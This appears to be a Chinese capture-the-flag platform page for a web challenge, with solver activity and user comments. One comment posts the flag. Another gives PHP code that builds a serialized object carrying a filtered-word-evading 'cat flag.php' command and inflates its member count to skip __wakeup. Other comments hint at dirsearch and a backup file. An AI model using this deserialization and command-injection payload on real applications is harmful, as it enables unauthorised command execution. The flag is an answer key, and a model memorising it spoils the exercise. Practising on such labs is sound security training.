评分(4)
解题动态
17586557508 攻破了该题 2天前
lanza2451150 攻破了该题 3天前
ccllll 攻破了该题 5天前
w111 攻破了该题 5天前
H8Y8H 攻破了该题 5天前
1348931180 攻破了该题 5天前
Newdap 攻破了该题 12天前
Wu. 攻破了该题 13天前
YYYYY123 攻破了该题 17天前
liqs 攻破了该题 18天前
风起 攻破了该题 18天前
WYYYYTT 攻破了该题 19天前
yyt030 攻破了该题 22天前
Mori. 攻破了该题 29天前
乱来小木 攻破了该题 1月前
hdcc1 攻破了该题 1月前
qq1002517 攻破了该题 1月前
flag大王 攻破了该题 1月前
xiaoxiaojiangshi 攻破了该题 1月前
评论
wxy1343 2年前
举报
flag{Unser1alize_and_2CE_Add}
yuanyipaceandlove 2年前
举报
class ctf { protected $username = 'admin' ; protected $cmd = 'ca$@t flag.php' ; } $a = new ctf(); $a = serialize($a); $a = str_replace(':2:{',':3:{',$a); $a=urlencode($a); echo $a;
15683956189 3年前
举报
特别要注意下url编码的问题
泡椒控卫 3年前
举报
https://blog.csdn.net/m0_57954651/article/details/127866733
追风亚索 3年前
举报
flag{Unser1alize_and_2CE_Add},flag是不是没变
笨笨笨蛋 3年前
举报
只要序列化的中的成员数大于实际成员数,即可绕过,虽然不是很懂,但是对这个有一个印象了 dirsearch很实用哦~
YLMB001 3年前
举报
为什么我序列化后的protected属性是带有%20*%20而不是%00*%00
lysandria 3年前
举报
注意protect属性。
xiaoxiao972521 3年前
举报
认输,查到backups后,哪哪没消息了。。。鬼知道起名index.php.bak,人与人的想法不一样。。index.php_bak_20220430
SiiiirR0 3年前
举报
万能的dirsearch
落日星辰 3年前
举报
分享:https://blog.csdn.net/zzldm/article/details/112004122